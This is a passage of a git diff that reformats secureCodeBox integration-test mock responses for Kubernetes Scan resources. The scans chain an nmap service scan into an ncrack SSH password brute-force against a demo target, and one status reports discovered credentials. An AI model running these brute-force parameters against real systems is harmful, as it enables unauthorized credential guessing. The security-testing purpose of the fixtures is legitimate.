false + } }, - "status": { - "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=dcde57274c3827a3c0836917f1b2b1ae7e4e50d652284f43fb9ec9bc49a7dea5", - "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=635b4b9eed12861b93ee0347845d79e8d1857659a53a9da025f838c9fb000345", - "findings": { - "categories": { - "Discovered Credentials": 1 - }, - "count": 1, - "severities": { - "high": 1, - "informational": 0, - "low": 0, - "medium": 0 - } - }, - "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=7bff833cd4fbda4e827159842ea4b6fa6f5a16fb0fd767fd669ee210a072e758", - "rawResultFile": "ncrack-results.xml", - "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=da487d933df9c7c6c3b0edcbfe546f521a31bd9f1bd772a61a8bcdeb78b61677", - "rawResultType": "ncrack-xml", - "state": "Parsing" - } + "hookSelector": {}, + "parameters": [ + "-v", + "-d10", + "-U", + "/ncrack/users.txt", + "-P", + "/ncrack/passwords.txt", + "-p", + "ssh:22", + "dummy-ssh.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "resources": {}, + "scanType": "ncrack" }, - { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "creationTimestamp": "2024-02-02T16:44:55Z", - "finalizers": [ - "s3.storage.securecodebox.io" - ], - "generateName": "nmap-dummy-ssh-", - "generation": 2, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:generateName": {} - }, - "f:spec": { + "status": { + "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=dcde57274c3827a3c0836917f1b2b1ae7e4e50d652284f43fb9ec9bc49a7dea5", + "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=635b4b9eed12861b93ee0347845d79e8d1857659a53a9da025f838c9fb000345", + "findings": { + "categories": { + "Discovered Credentials": 1 + }, + "count": 1, + "severities": { + "high": 1, + "informational": 0, + "low": 0, + "medium": 0 + } + }, + "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=7bff833cd4fbda4e827159842ea4b6fa6f5a16fb0fd767fd669ee210a072e758", + "rawResultFile": "ncrack-results.xml", + "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=da487d933df9c7c6c3b0edcbfe546f521a31bd9f1bd772a61a8bcdeb78b61677", + "rawResultType": "ncrack-xml", + "state": "Parsing" + } + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "creationTimestamp": "2024-02-02T16:44:55Z", + "finalizers": [ + "s3.storage.securecodebox.io" + ], + "generateName": "nmap-dummy-ssh-", + "generation": 2, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:generateName": {} + }, + "f:spec": { + ".": {}, + "f:cascades": { ".": {}, - "f:cascades": { + "f:inheritAffinity": {}, + "f:inheritAnnotations": {}, + "f:inheritEnv": {}, + "f:inheritHookSelector": {}, + "f:inheritInitContainers": {}, + "f:inheritLabels": {}, + "f:inheritTolerations": {}, + "f:inheritVolumes": {}, + "f:matchLabels": { ".": {}, - "f:inheritAffinity": {}, - "f:inheritAnnotations": {}, - "f:inheritEnv": {}, - "f:inheritHookSelector": {}, - "f:inheritInitContainers": {}, - "f:inheritLabels": {}, - "f:inheritTolerations": {}, - "f:inheritVolumes": {}, - "f:matchLabels": { - ".": {}, - "f:securecodebox.io/intensive": {}, - "f:securecodebox.io/invasive": {} - } - }, - "f:parameters": {}, - "f:resourceMode": {}, - "f:scanType": {} + "f:securecodebox.io/intensive": {}, + "f:securecodebox.io/invasive": {} + } + }, + "f:parameters": {}, + "f:resourceMode": {}, + "f:scanType": {} + } + }, + "manager": "unknown", + "operation": "Update", + "time": "2024-02-02T16:44:55Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:finalizers": { + ".": {}, + "v:\"s3.storage.securecodebox.io\"": {} } }, - "manager": "unknown", - "operation": "Update", - "time": "2024-02-02T16:44:55Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:finalizers": { + "f:spec": { + "f:cascades": { + "f:scopeLimiter": { ".": {}, - "v:\"s3.storage.securecodebox.io\"": {} + "f:validOnMissingRender": {} } }, - "f:spec": { - "f:cascades": { - "f:scopeLimiter": { - ".": {}, - "f:validOnMissingRender": {} - } - }, - "f:resources": {} - } - }, - "manager": "manager", - "operation": "Update", - "time": "2024-02-02T16:44:56Z" + "f:resources": {} + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { - "f:findings": { - "f:categories": { - ".": {}, - "f:Host": {}, - "f:Open Port": {} - }, - "f:count": {}, - "f:severities": { - "f:informational": {} - } + "manager": "manager", + "operation": "Update", + "time": "2024-02-02T16:44:56Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + "f:findings": { + "f:categories": { + ".": {}, + "f:Host": {}, + "f:Open Port": {} + }, + "f:count": {}, + "f:severities": { + "f:informational": {} } } - }, - "manager": "unknown", - "operation": "Update", - "subresource": "status", - "time": "2024-02-02T16:45:16Z" + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { + "manager": "unknown", + "operation": "Update", + "subresource": "status", + "time": "2024-02-02T16:45:16Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + ".": {}, + "f:findingDownloadLink": {}, + "f:findingHeadLink": {}, + "f:findings": { ".": {}, - "f:findingDownloadLink": {}, - "f:findingHeadLink": {}, - "f:findings": { - ".": {}, - "f:severities": {} - }, - "f:orderedHookStatuses": {}, - "f:rawResultDownloadLink": {}, - "f:rawResultFile": {}, - "f:rawResultHeadLink": {}, - "f:rawResultType": {}, - "f:state": {} - } - }, - "manager": "manager", - "operation": "Update", - "subresource": "status", - "time": "2024-02-02T16:45:33Z" - } - ], - "name": "nmap-dummy-ssh-7jz42", - "namespace": "integration-tests", - "resourceVersion": "10454", - "uid": "c887fffa-ddc9-4a7a-9415-7c46cfaa3649" - }, - "spec": { - "cascades": { - "inheritAffinity": true, - "inheritAnnotations": true, - "inheritEnv": false, - "inheritHookSelector": false, - "inheritInitContainers": false, - "inheritLabels": true, - "inheritTolerations": true, - "inheritVolumes": false, - "matchLabels": { - "securecodebox.io/intensive": "high", - "securecodebox.io/invasive": "invasive" + "f:severities": {} + }, + "f:orderedHookStatuses": {}, + "f:rawResultDownloadLink": {}, + "f:rawResultFile": {}, + "f:rawResultHeadLink": {}, + "f:rawResultType": {}, + "f:state": {} + } }, - "scopeLimiter": { - "validOnMissingRender": false - } + "manager": "manager", + "operation": "Update", + "subresource": "status", + "time": "2024-02-02T16:45:33Z" + } + ], + "name": "nmap-dummy-ssh-7jz42", + "namespace": "integration-tests", + "resourceVersion": "10454", + "uid": "c887fffa-ddc9-4a7a-9415-7c46cfaa3649" + }, + "spec": { + "cascades": { + "inheritAffinity": true, + "inheritAnnotations": true, + "inheritEnv": false, + "inheritHookSelector": false, + "inheritInitContainers": false, + "inheritLabels": true, + "inheritTolerations": true, + "inheritVolumes": false, + "matchLabels": { + "securecodebox.io/intensive": "high", + "securecodebox.io/invasive": "invasive" }, - "parameters": [ - "-Pn", - "-sV", - "dummy-ssh.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "resources": {}, - "scanType": "nmap" + "scopeLimiter": { + "validOnMissingRender": false + } }, - "status": { - "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=a17a3830b745b2f715641ed4e4ee5c561106a79eed6798d294fe693792e4315a", - "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=28127d19e36438aa686249a3e53e8ffb2ac38c02f9a5679127e0fc466b4fedfc", - "findings": { - "categories": { - "Host": 1, - "Open Port": 1 - }, - "count": 2, - "severities": { - "informational": 2 - } + "parameters": [ + "-Pn", + "-sV", + "dummy-ssh.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "resources": {}, + "scanType": "nmap" + }, + "status": { + "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=a17a3830b745b2f715641ed4e4ee5c561106a79eed6798d294fe693792e4315a", + "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=28127d19e36438aa686249a3e53e8ffb2ac38c02f9a5679127e0fc466b4fedfc", + "findings": { + "categories": { + "Host": 1, + "Open Port": 1 }, - "orderedHookStatuses": [ - [ - { - "hookName": "dssh-cascading-scans", - "jobName": "dssh-cascading-scans-nmap-dummy-ssh-7jz42-8gq5m", - "priority": 0, - "state": "Completed", - "type": "ReadOnly" - } - ] - ], - "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/nmap-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=13930cec08c3e576709d6620dcd16a0d51c230003c5346c653de643e0096e9a6", - "rawResultFile": "nmap-results.xml", - "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/nmap-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=9cc5a0324f40c250f8402587036e18386f6fbf47a81b431bed8c7af9cddc4c76", - "rawResultType": "nmap-xml", - "state": "Done" - } + "count": 2, + "severities": { + "informational": 2 + } + }, + "orderedHookStatuses": [ + [ + { + "hookName": "dssh-cascading-scans", + "jobName": "dssh-cascading-scans-nmap-dummy-ssh-7jz42-8gq5m", + "priority": 0, + "state": "Completed", + "type": "ReadOnly" + } + ] + ], + "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/nmap-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=13930cec08c3e576709d6620dcd16a0d51c230003c5346c653de643e0096e9a6", + "rawResultFile": "nmap-results.xml", + "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/nmap-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=9cc5a0324f40c250f8402587036e18386f6fbf47a81b431bed8c7af9cddc4c76", + "rawResultType": "nmap-xml", + "state": "Done" } - ], - "kind": "ScanList", - "metadata": { - "continue": "", - "resourceVersion": "10507" } + ], + "kind": "ScanList", + "metadata": { + "continue": "", + "resourceVersion": "10507" } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockCascadingScanCreationResponse.json b/tests/integration/__testFiles__/mockCascadingScanCreationResponse.json index 5d4f59d527..48237acc0f 100644 --- a/tests/integration/__testFiles__/mockCascadingScanCreationResponse.json +++ b/tests/integration/__testFiles__/mockCascadingScanCreationResponse.json @@ -1,74 +1,72 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "creationTimestamp": "2024-01-30T13:24:55Z", - "generateName": "nmap-dummy-ssh-", - "generation": 1, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:generateName": {} - }, - "f:spec": { + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "creationTimestamp": "2024-01-30T13:24:55Z", + "generateName": "nmap-dummy-ssh-", + "generation": 1, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:generateName": {} + }, + "f:spec": { + ".": {}, + "f:cascades": { ".": {}, - "f:cascades": { + "f:inheritAffinity": {}, + "f:inheritAnnotations": {}, + "f:inheritEnv": {}, + "f:inheritHookSelector": {}, + "f:inheritInitContainers": {}, + "f:inheritLabels": {}, + "f:inheritTolerations": {}, + "f:inheritVolumes": {}, + "f:matchLabels": { ".": {}, - "f:inheritAffinity": {}, - "f:inheritAnnotations": {}, - "f:inheritEnv": {}, - "f:inheritHookSelector": {}, - "f:inheritInitContainers": {}, - "f:inheritLabels": {}, - "f:inheritTolerations": {}, - "f:inheritVolumes": {}, - "f:matchLabels": { - ".": {}, - "f:securecodebox.io/intensive": {}, - "f:securecodebox.io/invasive": {} - } - }, - "f:parameters": {}, - "f:resourceMode": {}, - "f:scanType": {} - } - }, - "manager": "unknown", - "operation": "Update", - "time": "2024-01-30T13:24:55Z" - } - ], - "name": "nmap-dummy-ssh-d47zk", - "namespace": "integration-tests", - "resourceVersion": "20493", - "uid": "09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3" + "f:securecodebox.io/intensive": {}, + "f:securecodebox.io/invasive": {} + } + }, + "f:parameters": {}, + "f:resourceMode": {}, + "f:scanType": {} + } + }, + "manager": "unknown", + "operation": "Update", + "time": "2024-01-30T13:24:55Z" + } + ], + "name": "nmap-dummy-ssh-d47zk", + "namespace": "integration-tests", + "resourceVersion": "20493", + "uid": "09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3" + }, + "spec": { + "cascades": { + "inheritAffinity": true, + "inheritAnnotations": true, + "inheritEnv": false, + "inheritHookSelector": false, + "inheritInitContainers": false, + "inheritLabels": true, + "inheritTolerations": true, + "inheritVolumes": false, + "matchLabels": { + "securecodebox.io/intensive": "high", + "securecodebox.io/invasive": "invasive" + } }, - "spec": { - "cascades": { - "inheritAffinity": true, - "inheritAnnotations": true, - "inheritEnv": false, - "inheritHookSelector": false, - "inheritInitContainers": false, - "inheritLabels": true, - "inheritTolerations": true, - "inheritVolumes": false, - "matchLabels": { - "securecodebox.io/intensive": "high", - "securecodebox.io/invasive": "invasive" - } - }, - "parameters": [ - "-Pn", - "-sV", - "dummy-ssh.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "scanType": "nmap" - } + "parameters": [ + "-Pn", + "-sV", + "dummy-ssh.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "scanType": "nmap" } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockCascadingScanStatusResponse.json b/tests/integration/__testFiles__/mockCascadingScanStatusResponse.json index 1e269c96bb..0a2a8cf189 100644 --- a/tests/integration/__testFiles__/mockCascadingScanStatusResponse.json +++ b/tests/integration/__testFiles__/mockCascadingScanStatusResponse.json @@ -1,214 +1,212 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "annotations": { - "cascading.securecodebox.io/chain": "ncrack-ssh", - "cascading.securecodebox.io/matched-finding": "ca358271-980b-4f9a-a1b1-92b64f1d2a44", - "cascading.securecodebox.io/parent-scan": "nmap-dummy-ssh-d47zk", - "securecodebox.io/hook": "cascading-scans" + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "annotations": { + "cascading.securecodebox.io/chain": "ncrack-ssh", + "cascading.securecodebox.io/matched-finding": "ca358271-980b-4f9a-a1b1-92b64f1d2a44", + "cascading.securecodebox.io/parent-scan": "nmap-dummy-ssh-d47zk", + "securecodebox.io/hook": "cascading-scans" + }, + "creationTimestamp": "2024-01-30T13:25:25Z", + "finalizers": [ + "s3.storage.securecodebox.io" + ], + "generateName": "ncrack-dummy-ssh-d47zk-ncrack-ssh-", + "generation": 2, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:finalizers": { + ".": {}, + "v:\"s3.storage.securecodebox.io\"": {} + } + }, + "f:spec": { + "f:resources": {} + } + }, + "manager": "manager", + "operation": "Update", + "time": "2024-01-30T13:25:25Z" }, - "creationTimestamp": "2024-01-30T13:25:25Z", - "finalizers": [ - "s3.storage.securecodebox.io" - ], - "generateName": "ncrack-dummy-ssh-d47zk-ncrack-ssh-", - "generation": 2, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:finalizers": { - ".": {}, - "v:\"s3.storage.securecodebox.io\"": {} - } + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:annotations": { + ".": {}, + "f:cascading.securecodebox.io/chain": {}, + "f:cascading.securecodebox.io/matched-finding": {}, + "f:cascading.securecodebox.io/parent-scan": {}, + "f:securecodebox.io/hook": {} }, - "f:spec": { - "f:resources": {} + "f:generateName": {}, + "f:ownerReferences": { + ".": {}, + "k:{\"uid\":\"09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3\"}": {} } }, - "manager": "manager", - "operation": "Update", - "time": "2024-01-30T13:25:25Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:annotations": { + "f:spec": { + ".": {}, + "f:cascades": { + ".": {}, + "f:inheritAffinity": {}, + "f:inheritAnnotations": {}, + "f:inheritEnv": {}, + "f:inheritHookSelector": {}, + "f:inheritInitContainers": {}, + "f:inheritLabels": {}, + "f:inheritTolerations": {}, + "f:inheritVolumes": {}, + "f:matchLabels": { ".": {}, - "f:cascading.securecodebox.io/chain": {}, - "f:cascading.securecodebox.io/matched-finding": {}, - "f:cascading.securecodebox.io/parent-scan": {}, - "f:securecodebox.io/hook": {} + "f:securecodebox.io/intensive": {}, + "f:securecodebox.io/invasive": {} }, - "f:generateName": {}, - "f:ownerReferences": { + "f:scopeLimiter": { ".": {}, - "k:{\"uid\":\"09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3\"}": {} + "f:validOnMissingRender": {} } }, - "f:spec": { - ".": {}, - "f:cascades": { + "f:hookSelector": {}, + "f:parameters": {}, + "f:resourceMode": {}, + "f:scanType": {} + } + }, + "manager": "unknown", + "operation": "Update", + "time": "2024-01-30T13:25:25Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + "f:findings": { + "f:categories": { ".": {}, - "f:inheritAffinity": {}, - "f:inheritAnnotations": {}, - "f:inheritEnv": {}, - "f:inheritHookSelector": {}, - "f:inheritInitContainers": {}, - "f:inheritLabels": {}, - "f:inheritTolerations": {}, - "f:inheritVolumes": {}, - "f:matchLabels": { - ".": {}, - "f:securecodebox.io/intensive": {}, - "f:securecodebox.io/invasive": {} - }, - "f:scopeLimiter": { - ".": {}, - "f:validOnMissingRender": {} - } + "f:Discovered Credentials": {} }, - "f:hookSelector": {}, - "f:parameters": {}, - "f:resourceMode": {}, - "f:scanType": {} - } - }, - "manager": "unknown", - "operation": "Update", - "time": "2024-01-30T13:25:25Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { - "f:findings": { - "f:categories": { - ".": {}, - "f:Discovered Credentials": {} - }, - "f:count": {}, - "f:severities": { - "f:high": {} - } + "f:count": {}, + "f:severities": { + "f:high": {} } } - }, - "manager": "unknown", - "operation": "Update", - "subresource": "status", - "time": "2024-01-30T13:25:41Z" + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { + "manager": "unknown", + "operation": "Update", + "subresource": "status", + "time": "2024-01-30T13:25:41Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + ".": {}, + "f:findingDownloadLink": {}, + "f:findingHeadLink": {}, + "f:findings": { ".": {}, - "f:findingDownloadLink": {}, - "f:findingHeadLink": {}, - "f:findings": { - ".": {}, - "f:severities": {} - }, - "f:orderedHookStatuses": {}, - "f:rawResultDownloadLink": {}, - "f:rawResultFile": {}, - "f:rawResultHeadLink": {}, - "f:rawResultType": {}, - "f:state": {} - } - }, - "manager": "manager", - "operation": "Update", - "subresource": "status", - "time": "2024-01-30T13:25:45Z" - } - ], - "name": "ncrack-dummy-ssh-d47zk-ncrack-ssh-9ht7b", - "namespace": "integration-tests", - "ownerReferences": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "blockOwnerDeletion": true, - "controller": true, - "kind": "Scan", - "name": "nmap-dummy-ssh-d47zk", - "uid": "09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3" - } - ], - "resourceVersion": "20705", - "uid": "c613dd44-626d-44a8-be36-8b71d984068c" - }, - "spec": { - "cascades": { - "inheritAffinity": true, - "inheritAnnotations": true, - "inheritEnv": false, - "inheritHookSelector": false, - "inheritInitContainers": false, - "inheritLabels": true, - "inheritTolerations": true, - "inheritVolumes": false, - "matchLabels": { - "securecodebox.io/intensive": "high", - "securecodebox.io/invasive": "invasive" + "f:severities": {} + }, + "f:orderedHookStatuses": {}, + "f:rawResultDownloadLink": {}, + "f:rawResultFile": {}, + "f:rawResultHeadLink": {}, + "f:rawResultType": {}, + "f:state": {} + } }, - "scopeLimiter": { - "validOnMissingRender": false - } + "manager": "manager", + "operation": "Update", + "subresource": "status", + "time": "2024-01-30T13:25:45Z" + } + ], + "name": "ncrack-dummy-ssh-d47zk-ncrack-ssh-9ht7b", + "namespace": "integration-tests", + "ownerReferences": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "blockOwnerDeletion": true, + "controller": true, + "kind": "Scan", + "name": "nmap-dummy-ssh-d47zk", + "uid": "09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3" + } + ], + "resourceVersion": "20705", + "uid": "c613dd44-626d-44a8-be36-8b71d984068c" + }, + "spec": { + "cascades": { + "inheritAffinity": true, + "inheritAnnotations": true, + "inheritEnv": false, + "inheritHookSelector": false, + "inheritInitContainers": false, + "inheritLabels": true, + "inheritTolerations": true, + "inheritVolumes": false, + "matchLabels": { + "securecodebox.io/intensive": "high", + "securecodebox.io/invasive": "invasive" }, - "hookSelector": {}, - "parameters": [ - "-v", - "-d10", - "-U", - "/ncrack/users.txt", - "-P", - "/ncrack/passwords.txt", - "-p", - "ssh:22", - "dummy-ssh.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "resources": {}, - "scanType": "ncrack" + "scopeLimiter": { + "validOnMissingRender": false + } }, - "status": { - "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=39576bace58a75c3daba5097a26215a7b99ca62de62fb0e3066939c6ea4b17a2", - "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=eb1546645b611d5f8e43c696ab11a759c0b6257f046425f1747e639ee88c958e", - "findings": { - "categories": { - "Discovered Credentials": 1 - }, - "count": 1, - "severities": { - "high": 1 - } + "hookSelector": {}, + "parameters": [ + "-v", + "-d10", + "-U", + "/ncrack/users.txt", + "-P", + "/ncrack/passwords.txt", + "-p", + "ssh:22", + "dummy-ssh.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "resources": {}, + "scanType": "ncrack" + }, + "status": { + "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=39576bace58a75c3daba5097a26215a7b99ca62de62fb0e3066939c6ea4b17a2", + "findingHeadLink": 